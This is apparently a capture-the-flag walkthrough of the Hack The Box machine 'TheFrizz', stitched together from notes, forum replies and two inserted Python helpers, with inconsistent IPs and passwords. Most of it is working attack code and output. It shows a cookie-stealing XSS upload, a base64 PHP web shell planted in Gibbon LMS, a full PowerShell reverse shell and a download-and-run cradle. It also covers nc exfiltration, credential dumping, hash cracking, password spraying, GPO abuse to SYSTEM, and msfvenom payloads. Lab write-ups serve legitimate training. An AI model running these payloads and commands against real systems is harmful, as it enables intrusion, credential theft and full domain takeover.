htb-thefrizz
Reconnaissance and Enumeration
Port Scanning
┌──(puck㉿kali)-[~/htb/thefrizz]
└─$ nmap -sC -sV 10000 10.10.11.60 -oN thefrizz.nmap
Starting Nmap 7.93 ( https://nmap.org ) at 2025-03-19 09:53 CET
Nmap scan report for 10.10.11.60
Host is up (0.0089s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
22/tcp   open  ssh           OpenSSH for_Windows_9.5 (protocol 2.0)
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
|_http-title: Did not follow redirect to http://frizzdc.frizz.htb/home/
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-03-19 15:54:08Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Hosts: localhost, FRIZZDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2025-03-19T15:54:09
|_  start_date: N/A
| smb2-security-mode:
|   311:
|_    Message signing enabled and required
|_clock-skew: 6h59m59s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 2 IP addresses (1 host up) scanned in 52.93 seconds
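The scan reports a clock skew of almost seven hours between Kali and the DC. Kerberos only tolerates a small offset (MIT krb5 and Windows both default to 5 minutes), which is why the Kerberos and SSH steps further down fail until the clock is synced with ntpdate. The following is an added example, not part of the original write-up: it parses nmap's clock-skew notation and the port-88 server-time banner into seconds and flags offsets the KDC would reject; the sample nmap lines are a constructed excerpt of the output above.

```python
import re
from datetime import datetime, timezone
from typing import Iterable, Optional

# Kerberos (RFC 4120) lets the KDC reject requests whose timestamp differs from
# its own clock by more than the configured tolerance. MIT krb5 ("clockskew")
# and Windows ("Maximum tolerance for computer clock synchronization") both
# default to 5 minutes.
KERBEROS_MAX_SKEW_SECONDS = 300

# nmap prints skew as e.g. "6h59m59s", "-2s", "0s" or "1d2h3m4s".
_SKEW_RE = re.compile(r"^(-?)(?:(\d+)d)?(?:(\d+)h)?(?:(\d+)m)?(?:(\d+)s)?$")


def parse_nmap_skew(skew: str) -> int:
    """Convert nmap's clock-skew string into signed seconds."""
    skew = skew.strip()
    m = _SKEW_RE.match(skew)
    if not m or skew in ("", "-"):
        raise ValueError(f"unrecognised clock-skew value: {skew!r}")
    sign, days, hours, minutes, seconds = m.groups()
    total = (int(days or 0) * 86400 + int(hours or 0) * 3600
             + int(minutes or 0) * 60 + int(seconds or 0))
    return -total if sign else total


def skew_from_nmap_output(lines: Iterable[str]) -> Optional[int]:
    """Pull the first |_clock-skew line out of nmap host-script output.

    Newer nmap versions print "mean: Xs, deviation: Ys, median: Zs";
    in that case the mean is used."""
    for line in lines:
        line = line.strip()
        if not line.startswith("|_clock-skew:"):
            continue
        value = line.split(":", 1)[1].strip()
        if value.startswith("mean:"):
            value = value[len("mean:"):].split(",", 1)[0].strip()
        return parse_nmap_skew(value)
    return None


def kerberos_will_reject(skew_seconds: int,
                         tolerance: int = KERBEROS_MAX_SKEW_SECONDS) -> bool:
    """True when the KDC would answer KRB_AP_ERR_SKEW for this offset."""
    return abs(skew_seconds) > tolerance


def skew_from_server_time(server_time_utc: str, local_time_utc: str) -> int:
    """Skew (server minus local, in seconds) computed from the 'server time'
    that nmap prints in the port-88 banner and the scanner's own UTC time.
    Both strings use the banner's format, e.g. '2025-03-19 15:54:08Z'."""
    fmt = "%Y-%m-%d %H:%M:%SZ"
    server = datetime.strptime(server_time_utc, fmt).replace(tzinfo=timezone.utc)
    local = datetime.strptime(local_time_utc, fmt).replace(tzinfo=timezone.utc)
    return int((server - local).total_seconds())


# Constructed excerpt of the host-script section of the scan above.
SAMPLE_NMAP_LINES = [
    "Host script results:",
    "| smb2-time:",
    "|   date: 2025-03-19T15:54:09",
    "|_  start_date: N/A",
    "|_clock-skew: 6h59m59s",
]

if __name__ == "__main__":
    skew = skew_from_nmap_output(SAMPLE_NMAP_LINES)
    print(f"skew: {skew}s, Kerberos would reject: {kerberos_will_reject(skew)}")
```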
http://frizzdc.frizz.htb/Gibbon-LMS/?q=gibbon.sql
CVE-2024-24725 – https://www.exploit-db.com/exploits/51903.
Should find credentials for Gibbon LMS.
curl -X POST "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Planner/resources_addQuick_ajaxProcess.php" \
  -F "id=body" \
  -F "bodyfile1=@l.jpg;filename=<img src=x onerror=new Image().src='<redacted>?cookie='+document.cookie>.jpg" \
  -F "imagesAsLinks=Y"
File upload
https://herolab.usd.de/security-advisories/usd-2023-0025/
C:\xampp\htdocs\gibbon-lms> type config.php
$databaseServer = 'localhost';
$databaseUsername = 'MrGibbonsDB';
$databasePassword = 'MisterGibbs!Parrot!?1';
$databaseName = 'gibbon';
PS C:\xampp\htdocs\gibbon-lms> netstat -an | FINDSTR 3306
netstat -an | FINDSTR 3306
  TCP    0.0.0.0:3306           0.0.0.0:0              LISTENING
  TCP    [::]:3306              [::]:0                 LISTENING
  UDP    [::]:63306             *:*
Upload a web shell
curl -X POST "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php" \
  -H "Host: frizzdc.frizz.htb" \
  --data-urlencode "img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4K" \
  --data-urlencode "path=shell.php" \
  --data-urlencode "gibbonPersonID=0000000001"
Then generate a reverse shell with your IP and PORT on revshells.com using the PowerShell #3 (base64) option.
Then go to
http://frizzdc.frizz.htb/Gibbon-LMS/shell.php?cmd=[Insert base64 encoded reverse shell]
Remember to listen on the port you chose on revshells.com:
nc -lvnp XXX
1st
┌──(puck㉿kali)-[~/htb/thefrizz]
└─$ curl -X POST "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php" \
  -H "Host: frizzdc.frizz.htb" \
  --data-urlencode "img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4K" \
  --data-urlencode "path=shell.php" \
  --data-urlencode "gibbonPersonID=0000000001"
shell.php
┌──(puck㉿kali)-[~/htb/thefrizz]
then
http://frizzdc.frizz.htb/Gibbon-LMS/shell.php?cmd=whoami
frizz\w.webservice frizz\w.webservice
http://frizzdc.frizz.htb/Gibbon-LMS/shell.php?cmd=net user
User accounts for \\FRIZZDC

-------------------------------------------------------------------------------
a.perlstein              Administrator            c.ramon
c.sandiego               d.hudson                 f.frizzle
g.frizzle                Guest                    h.arm
J.perlstein              k.franklin               krbtgt
l.awesome                m.ramon                  M.SchoolBus
p.terese                 r.tennelli               t.wright
v.frizzle                w.li                     w.Webservice
The command completed successfully.
next
┌──(puck㉿kali)-[~/htb/thefrizz]
└─$ cat puckshell.txt
function cleanup {
if ($client.Connected -eq $true) {$client.Close()}
if ($process.ExitCode -ne $null) {$process.Close()}
exit}
# Setup IPADDR
$address = '10.10.14.3'
# Setup PORT
$port = '443'
$client = New-Object system.net.sockets.tcpclient
$client.connect($address,$port)
$stream = $client.GetStream()
$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize
$process = New-Object System.Diagnostics.Process
$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'
$process.StartInfo.RedirectStandardInput = 1
$process.StartInfo.RedirectStandardOutput = 1
$process.StartInfo.UseShellExecute = 0
$process.Start()
$inputstream = $process.StandardInput
$outputstream = $process.StandardOutput
Start-Sleep 1
$encoding = new-object System.Text.AsciiEncoding
while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}
$stream.Write($encoding.GetBytes($out),0,$out.Length)
$out = $null; $done = $false; $testing = 0;
while (-not $done) {
if ($client.Connected -ne $true) {cleanup}
$pos = 0; $i = 1
while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {
$read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)
$pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}
if ($pos -gt 0) {
$string = $encoding.GetString($networkbuffer,0,$pos)
$inputstream.write($string)
start-sleep 1
if ($process.ExitCode -ne $null) {cleanup}
else {
$out = $encoding.GetString($outputstream.Read())
while($outputstream.Peek() -ne -1){
$out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}
$stream.Write($encoding.GetBytes($out),0,$out.length)
$out = $null
$string = $null}} else {cleanup}}
┌──(puck㉿kali)-[~/htb/thefrizz]
cmd.exe /c powershell -c IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.3:8000/puckshell.txt');
http://frizzdc.frizz.htb/Gibbon-LMS/shell.php?cmd=cmd.exe /c powershell -c IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.3:8000/puckshell.txt');
┌──(puck㉿kali)-[~/htb/thefrizz]
└─$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.11.60 - - [19/Mar/2025 11:38:32] "GET /puckshell.txt HTTP/1.1" 200 -
10.10.11.60 - - [19/Mar/2025 11:39:29] "GET /puckshell.txt HTTP/1.1" 200 -
and a shell
┌──(puck㉿kali)-[~/htb/thefrizz]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.11.60] 51111
Microsoft Windows [Version 10.0.20348.3207]
(c) Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\Gibbon-LMS>whoami
frizz\w.webservice

C:\xampp\htdocs\Gibbon-LMS>
User:
Now we can collect AD information as w.webservice, which is a domain user.
Upload SharpHound.exe to the machine and start collecting domain info.
# download SharpHound to the target
> certutil -urlcache -f http://10.10.14.3:8000/SharpHound.exe SharpHound.exe
# run SharpHound
> SharpHound.exe -c All
# send the result back
> nc64.exe 10.10.14.3 5555 < 20241218170837_BloodHound.zip
# on the attacking box
> nc -nlvp 5555 > output.zip
or we use
serving smb
# impacket-smbserver -smb2support share . -user puck -pass puckpuck
on client
c:\temp>net use \\10.10.14.3\share /u:puck puckpuck
net use \\10.10.14.10\share /u:puck puckpuck
The command completed successfully.
c:\temp>copy 20241218170837_BloodHound.zip \\10.10.14.10\share\
copy 20241218170837_BloodHound.zip \\10.10.14.10\share\
1 file(s) copied.
User.
First we need to find f.frizzle's hash:
c:\xampp\mysql\bin>whoami
frizz\w.webservice

c:\xampp\mysql\bin>mysql.exe -h localhost -u MrGibbonsDB "-pMisterGibbs!Parrot!?1" -Bse "show databases;"
gibbon
information_schema
test

c:\xampp\mysql\bin>mysql.exe -h localhost -u MrGibbonsDB "-pMisterGibbs!Parrot!?1" -Bse "use gibbon;select * from gibbonperson;",
0000000001  Ms.  Frizzle  Fiona  Fiona  Fiona Frizzle  Unspecified  f.frizzle  067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03  /aACFhikmNopqrRTVz2489  N  Full  Y  001  001  NULL  f.frizzle@frizz.htb  NULL  NULL  ::1  2024-10-29 09:28:59  NULL  NULL  0  NULL  NULL  NULL  NULL  Y  YN  NULL  NULL  NULL  NULL  NULL  NULL  NULL  Y  NULL  NULL  NULL

c:\xampp\mysql\bin>
and then crack it with:
hashcat -m 1420 ffrizzlehash.txt /usr/share/wordlists/rockyou.txt
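Why mode 1420: Gibbon stores passwordStrong = sha256(passwordStrongSalt || password) as hex, with the per-user salt in the column right after the hash, which is hashcat's sha256($salt.$pass) with "hash:salt" input lines. The following is an added example, not code from the write-up or from Gibbon: it recomputes and verifies a Gibbon hash, builds the hashcat input line, and picks hash and salt out of a -Bse row; the tab-separated sample row is constructed from the dump above, and the row parser's column assumptions are mine.

```python
import hashlib
import hmac

# Gibbon LMS (core/Gibbon.php, passwordStrong/passwordStrongSalt columns)
# stores each user's password as a single, fast SHA-256 round over
# salt || plaintext. That is hashcat mode 1420 (sha256($salt.$pass)),
# and a fast hash is why a rockyou run finishes in seconds; a slow KDF
# (bcrypt/Argon2 via PHP's password_hash()) would not crack this way.

# Hash and salt from the gibbonperson row dumped above.
PAGE_STORED_HASH = "067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03"
PAGE_SALT = "/aACFhikmNopqrRTVz2489"


def gibbon_hash(salt: str, password: str) -> str:
    """Recompute Gibbon's passwordStrong value for a salt/password pair."""
    return hashlib.sha256((salt + password).encode("utf-8")).hexdigest()


def verify_gibbon_password(salt: str, password: str, stored_hash: str) -> bool:
    """Constant-time check of a candidate password against the stored hash."""
    return hmac.compare_digest(gibbon_hash(salt, password), stored_hash.lower())


def to_hashcat_1420(stored_hash: str, salt: str) -> str:
    """Format one gibbonperson row as a line for `hashcat -m 1420`."""
    return f"{stored_hash}:{salt}"


def parse_gibbonperson_row(row: str) -> dict:
    """Pick username, hash and salt out of a tab-separated `mysql -Bse` row.

    Assumption (mine, matching the dump above): the 64-hex-char
    passwordStrong field is preceded by username and followed by
    passwordStrongSalt."""
    fields = row.split("\t")
    for i, f in enumerate(fields):
        if len(f) == 64 and all(c in "0123456789abcdef" for c in f.lower()):
            return {"username": fields[i - 1], "hash": f, "salt": fields[i + 1]}
    raise ValueError("no sha256-looking field in row")


# Constructed demo row in the tab-separated layout mysql -Bse prints.
SAMPLE_ROW = "\t".join([
    "0000000001", "Ms.", "Frizzle", "Fiona", "Fiona", "Fiona Frizzle", "",
    "Unspecified", "f.frizzle", PAGE_STORED_HASH, PAGE_SALT, "N", "Full", "Y",
])

if __name__ == "__main__":
    rec = parse_gibbonperson_row(SAMPLE_ROW)
    # This is the line to put in ffrizzlehash.txt for hashcat -m 1420.
    print(to_hashcat_1420(rec["hash"], rec["salt"]))
```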
┌──(puck㉿kali)-[~/htb/thefrizz]
└─$ impacket-getTGT frizz.htb/f.frizzle
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password:Jenni_Luvs_Magic23
[*] Saving ticket in f.frizzle.ccache
┌──(puck㉿kali)-[~/htb/thefrizz]
└─$ export KRB5CCNAME=f.frizzle.ccache
┌──(puck㉿kali)-[~/htb/thefrizz]
└─$ klist
Ticket cache: FILE:f.frizzle.ccache
Default principal: f.frizzle@FRIZZ.HTB
Valid starting Expires Service principal
03/19/2025 23:11:22 03/20/2025 09:11:22 krbtgt/FRIZZ.HTB@FRIZZ.HTB
renew until 03/20/2025 23:11:22
┌──(puck㉿kali)-[~/htb/thefrizz]
then ssh f.frizzle@10.10.11.60
┌──(puck㉿kali)-[~/htb/thefrizz]
└─$ ssh f.frizzle@10.10.11.60
The authenticity of host '10.10.11.60 (10.10.11.60)' can't be established.
ED25519 key fingerprint is SHA256:667C2ZBnjXAV13iEeKUgKhu6w5axMrhU346z2L2OE7g.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:46: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.60' (ED25519) to the list of known hosts.
f.frizzle@10.10.11.60: Permission denied (gssapi-with-mic,keyboard-interactive).
┌──(puck㉿kali)-[~/htb/thefrizz]
tried with
┌──(puck㉿kali)-[~/htb/thefrizz]
└─$ impacket-getTGT frizz.htb/m.schoolbus
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password: !suBcig@MehTed!R
[*] Saving ticket in m.schoolbus.ccache
┌──(puck㉿kali)-[~/htb/thefrizz]
└─$ export KRB5CCNAME=m.schoolbus.ccache
┌──(puck㉿kali)-[~/htb/thefrizz]
└─$ klist
Ticket cache: FILE:m.schoolbus.ccache
Default principal: m.schoolbus@FRIZZ.HTB
Valid starting Expires Service principal
03/19/2025 23:20:07 03/20/2025 09:20:07 krbtgt/FRIZZ.HTB@FRIZZ.HTB
renew until 03/20/2025 23:20:07
┌──(puck㉿kali)-[~/htb/thefrizz]
└─$ ssh m.schoolbus@10.10.11.60
m.schoolbus@10.10.11.60: Permission denied (gssapi-with-mic,keyboard-interactive).
┌──(puck㉿kali)-[~/htb/thefrizz]
f.frizzle:Jenni_Luvs_Magic23
m.schoolbus:!suBcig@MehTed!R
After obtaining a ccache for m.schoolbus, connect via SSH and abuse the GPO permissions with:
# add a new GPO
New-GPO -Name "doesnotmatter"
# link it to the Domain Controllers OU
New-GPLink -Name "doesnotmatter" -Target "OU=Domain Controllers,DC=frizz,DC=htb"
# add m.schoolbus to the local Administrators group
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount M.SchoolBus --GPOName doesnotmatter
# force a group policy update
gpupdate /force
# send yourself a reverse shell with admin rights:
.\RunasCs.exe "M.SchoolBus" '!suBcig@MehTed!R' powershell.exe -r 10.10.14.7:9001
Transferring RunasCs and SharpGPOAbuse to the target is up to you.
krb5.conf
[libdefaults]
default_realm = FRIZZ.HTB
dns_lookup_realm = false
dns_lookup_kdc = true
ticket_lifetime = 24h
renew_lifetime = 7d
forwardable = true
proxiable = true
[realms]
FRIZZ.HTB = {
kdc = frizzdc.frizz.htb
admin_server = frizzdc.frizz.htb
default_domain = frizz.htb
}
[domain_realm]
.frizz.htb = FRIZZ.HTB
frizz.htb = FRIZZ.HTB
sudo ntpdate 10.10.11.60
getTGT.py frizz.htb/f.frizzle
export KRB5CCNAME=f.frizzle.ccache
ssh f.frizzle@10.10.11.60
This worked for me.
I did everything right. Still this error. Hate this machine...
Error: An error of type GSSAPI::GssApiError happened, message is gss_init_sec_context did not return GSS_S_COMPLETE: Unspecified GSS failure. Minor code may provide more information
It should work, when you ssh, try to use: ssh -o GSSAPITrustDNS=no -o GSSAPIAuthentication=yes f.frizzle@frizz.htb
It may also help to have /etc/hosts like this:
10.10.11.60 frizzdc.frizz.htb frizz.htb
So having the DC name as first entry.
This resolved some rDNS issues for me.
For me it worked.
Before logging in, first set up the SSH config to allow Kerberos authentication to succeed, by modifying the file /etc/ssh/ssh_config and allowing some options:
GSSAPIAuthentication yes
GSSAPIDelegateCredentials yes
GSSAPIKeyExchange yes
GSSAPITrustDNS yes
and for SSH login we need to export the kerberos file ccache
┌──(puck㉿kali)-[~/htb/thefrizz]
└─$ ssh -K f.frizzle@10.10.11.60
PowerShell 7.4.5
PS C:\Users\f.frizzle>
PS C:\Users\f.frizzle> whoami
frizz\f.frizzle
PS C:\Users\f.frizzle> cd desktop
PS C:\Users\f.frizzle\Desktop> dir
Directory: C:\Users\f.frizzle\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar-- 4/9/2025 7:38 AM 34 user.txt
PS C:\Users\f.frizzle\Desktop> type user.txt
a7a925069533cab461043a66ff7ff57c
PS C:\Users\f.frizzle\Desktop>
Privesc from f.frizzle to higher privileges
PS C:\ProgramData> whoami
frizz\f.frizzle
PS C:\ProgramData> (New-Object -ComObject Shell.Application).NameSpace(0x0a).Items()

Application  : System.__ComObject
Parent       : System.__ComObject
Name         : wapt-backup-sunday.7z
Path         : C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103\$RE2XMEG.7z
GetLink      :
GetFolder    :
IsLink       : False
IsFolder     : False
IsFileSystem : True
IsBrowsable  : False
ModifyDate   : 10/24/2024 9:16:29 PM
Size         : 30416987
Type         : 7Z File

PS C:\ProgramData>
The PowerShell command above lists the contents of the Recycle Bin (shell namespace 0x0a), i.e. files that were deleted but not yet purged. There is a file named wapt-backup-sunday.7z; just restore it:
# get the path
$pathFile = (New-Object -ComObject Shell.Application).NameSpace(0x0a).Items() | Select -ExpandProperty Path
# copy
Copy-Item $pathFile ./
PS C:\ProgramData> $pathFile = (New-Object -ComObject Shell.Application).NameSpace(0x0a).Items() | Select -ExpandProperty Path
PS C:\ProgramData> Copy-Item $pathFile ./
PS C:\ProgramData> ls
Directory: C:\ProgramData
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 5/8/2021 1:27 AM Microsoft
d----- 2/20/2025 2:50 PM Package Cache
d----- 2/26/2025 8:05 AM regid.1991-06.com.microsoft
d----- 5/8/2021 1:15 AM SoftwareDistribution
d----- 3/17/2025 4:12 PM ssh
d----- 10/29/2024 7:15 AM USOPrivate
d----- 5/8/2021 1:15 AM USOShared
d----- 2/20/2025 2:50 PM VMware
-a---- 10/24/2024 9:16 PM 30416987 $RE2XMEG.7z
-a---- 4/10/2025 9:23 AM 6 1.txt
-a---- 4/10/2025 6:54 AM 12447 20250410065420_BloodHound.zip
-a---- 4/10/2025 7:50 AM 12644 20250410075037_output.zip
-a---- 4/10/2025 6:54 AM 10410 MzY2OGI0YzgtYjEwMy00ZDZmLThhNzAtNmI4ZDI0NjQ1YmNj.bin
-a---- 4/10/2025 6:53 AM 1046528 SharpHound.exe
PS C:\ProgramData>
Just go back to using SCP to download from the target server to local.
scp f.frizzle@frizz.htb:'./$RE2XMEG.7z' ./
# then extract
7za x -y '$RE2XMEG.7z' -o/home/kali/ctf/htb/frizz/unarchive
--
I used python3 -m uploadserver (and then netcat to transfer the file to my Kali box).
┌──(puck㉿kali)-[~/htb/thefrizz]
└─$ python3 -m uploadserver
File upload available at /upload
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.11.60 - - [10/Apr/2025 19:43:05] "GET /nc64.exe HTTP/1.1" 200 -
then
PS C:\ProgramData> curl http://10.10.14.13:8000/nc64.exe -outfile nc64.exe
then
┌──(puck㉿kali)-[~/htb/thefrizz]
└─$ nc -nlvp 9001 > RE2XMEG.7z
listening on [any] 9001 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.11.60] 55918
PS C:\ProgramData> cmd
Microsoft Windows [Version 10.0.20348.3207]
(c) Microsoft Corporation. All rights reserved.
frizz\f.frizzle@FRIZZDC C:\ProgramData>nc64.exe 10.10.14.13 9001 < $RE2XMEG.7z
then extract
┌──(puck㉿kali)-[~/htb/thefrizz]
└─$ 7za x -y 'RE2XMEG.7z' -o/home/puck/htb/thefrizz/unarchive
7-Zip (a) 23.01 (x64) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20
64-bit locale=en_US.UTF-8 Threads:8 OPEN_MAX:1024
Scanning the drive for archives:
1 file, 30416987 bytes (30 MiB)
Extracting archive: RE2XMEG.7z
--
Path = RE2XMEG.7z
Type = 7z
Physical Size = 30416987
Headers Size = 65880
Method = ARM64 LZMA2:26 LZMA:20 BCJ2
Solid = +
Blocks = 3
Everything is Ok
Folders: 684
Files: 5384
Size: 141187501
Compressed: 30416987
┌──(puck㉿kali)-[~/htb/thefrizz]
┌──(puck㉿kali)-[~/…/thefrizz/unarchive/wapt/conf]
└─$ ls
ca-192.168.120.158.crt forward_ssl_auth.conf uwsgi_params waptserver.ini.template
ca-192.168.120.158.pem require_ssl_auth.conf waptserver.ini
┌──(puck㉿kali)-[~/…/thefrizz/unarchive/wapt/conf]
└─$ grep -rl "password" ./
./waptserver.ini
./waptserver.ini.template
┌──(puck㉿kali)-[~/…/thefrizz/unarchive/wapt/conf]
└─$ cat waptserver.ini | grep password
wapt_password = IXN1QmNpZ0BNZWhUZWQhUgo=
┌──(puck㉿kali)-[~/…/thefrizz/unarchive/wapt/conf]
└─$
The extracted archive contains a large number of files; after filtering with grep and a little analysis, a base64-encoded password was found in ./conf/waptserver.ini:
┌──(puck㉿kali)-[~/…/thefrizz/unarchive/wapt/conf]
└─$ echo "IXN1QmNpZ0BNZWhUZWQhUgo=" | base64 -d
!suBcig@MehTed!R
Next, password-spray this password against the user list:
┌──(puck㉿kali)-[~/htb/thefrizz]
└─$ ./kerbrute_linux_amd64 passwordspray -d frizz.htb --dc 10.10.11.60 user.txt '!suBcig@MehTed!R'
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 04/10/25 - Ronnie Flathers @ropnop
2025/04/10 21:06:35 > Using KDC(s):
2025/04/10 21:06:35 > 10.10.11.60:88
2025/04/10 21:06:35 > [+] VALID LOGIN: M.SchoolBus@frizz.htb:!suBcig@MehTed!R
2025/04/10 21:06:35 > Done! Tested 20 logins (1 successes) in 0.112 seconds
It finds that the password belongs to M.SchoolBus@frizz.htb:!suBcig@MehTed!R
GPO privesc
BloodHound shows:
PS C:\ProgramData> New-GPO -Name "pGPO"
New-GPO -Name "pGPO"
DisplayName : pGPO
DomainName : frizz.htb
Owner : frizz\M.SchoolBus
Id : d3835771-8a10-49c8-bd80-99e1f6d437d5
GpoStatus : AllSettingsEnabled
Description :
CreationTime : 4/9/2025 8:50:34 AM
ModificationTime : 4/9/2025 8:50:34 AM
UserVersion : AD Version: 0, SysVol Version: 0
ComputerVersion : AD Version: 0, SysVol Version: 0
WmiFilter :
PS C:\ProgramData> New-GPLink -Name "pGPO" -Target "OU=Domain Controllers,DC=frizz,DC=htb"
New-GPLink -Name "pGPO" -Target "OU=Domain Controllers,DC=frizz,DC=htb"
GpoId : d3835771-8a10-49c8-bd80-99e1f6d437d5
DisplayName : pGPO
Enabled : True
Enforced : False
Target : OU=Domain Controllers,DC=frizz,DC=htb
Order : 2
PS C:\ProgramData> Get-GPO -All
Get-GPO -All
DisplayName : Default Domain Policy
DomainName : frizz.htb
Owner : frizz\Domain Admins
Id : 31b2f340-016d-11d2-945f-00c04fb984f9
GpoStatus : AllSettingsEnabled
Description :
CreationTime : 10/29/2024 7:19:24 AM
ModificationTime : 10/29/2024 7:25:44 AM
UserVersion : AD Version: 0, SysVol Version: 0
ComputerVersion : AD Version: 2, SysVol Version: 2
WmiFilter :
DisplayName : Default Domain Controllers Policy
DomainName : frizz.htb
Owner : frizz\Domain Admins
Id : 6ac1786c-016f-11d2-945f-00c04fb984f9
GpoStatus : AllSettingsEnabled
Description :
CreationTime : 10/29/2024 7:19:24 AM
ModificationTime : 10/29/2024 7:19:24 AM
UserVersion : AD Version: 0, SysVol Version: 0
ComputerVersion : AD Version: 1, SysVol Version: 1
WmiFilter :
DisplayName : pGPO
DomainName : frizz.htb
Owner : frizz\M.SchoolBus
Id : d3835771-8a10-49c8-bd80-99e1f6d437d5
GpoStatus : AllSettingsEnabled
Description :
CreationTime : 4/9/2025 8:50:34 AM
ModificationTime : 4/9/2025 8:50:34 AM
UserVersion : AD Version: 0, SysVol Version: 0
ComputerVersion : AD Version: 0, SysVol Version: 0
WmiFilter :
PS C:\ProgramData> .\gpo.exe --AddComputerTask --TaskName "privesc" --Author administrator --Command "cmd.exe" --Arguments "/c C:\programdata\rcat_10.10.14.13_9001.exe" --GPOName "pGPO" --Force
.\gpo.exe --AddComputerTask --TaskName "privesc" --Author administrator --Command "cmd.exe" --Arguments "/c C:\programdata\rcat_10.10.14.13_9001.exe" --GPOName "pGPO" --Force
[+] Domain = frizz.htb
[+] Domain Controller = frizzdc.frizz.htb
[+] Distinguished Name = CN=Policies,CN=System,DC=frizz,DC=htb
[+] GUID of "pGPO" is: {D3835771-8A10-49C8-BD80-99E1F6D437D5}
[+] Creating file \\frizz.htb\SysVol\frizz.htb\Policies\{D3835771-8A10-49C8-BD80-99E1F6D437D5}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new immediate task. Wait for the GPO refresh cycle.
[+] Done!
PS C:\ProgramData> gpupdate /force
gpupdate /force
Updating policy...
Computer Policy update has completed successfully.
User Policy update has completed successfully.
PS C:\ProgramData>
Giving a shell
┌──(puck㉿kali)-[~/htb/thefrizz]
└─$ rlwrap nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.11.60] 57317
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> whoami
whoami
nt authority\system
PS C:\Windows\system32> hostname
hostname
frizzdc
PS C:\Windows\system32>

┌──(puck㉿kali)-[~/htb/thefrizz]
└─$ msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.3 LPORT=1337 -f exe > shell2.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 200774 bytes
Final size of exe file: 207360 bytes

┌──(puck㉿kali)-[~/htb/thefrizz]
└─$ msfconsole -qx "use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set LHOST 10.10.14.3; set LPORT 1337; run"
[*] Using configured payload generic/shell_reverse_tcp
payload => windows/meterpreter/reverse_tcp
LHOST => 10.10.14.3
LPORT => 1337
[*] Started reverse TCP handler on 10.10.14.3:1337
[*] Sending stage (175686 bytes) to 10.10.11.60
[*] Meterpreter session 1 opened (10.10.14.3:1337 -> 10.10.11.60:60582) at 2025-03-20 17:57:20 +0100

meterpreter > getuid
Server username: frizz\w.Webservice
meterpreter >
*Evil-WinRM* PS C:\programdata> $SecPassword = ConvertTo-SecureString 'Jenni_Luvs_Magic23!' -AsPlainText -Force
*Evil-WinRM* PS C:\programdata> $Cred = New-Object System.Management.Automation.PSCredential('frizzle.htb\f.frizzle', $SecPassword)

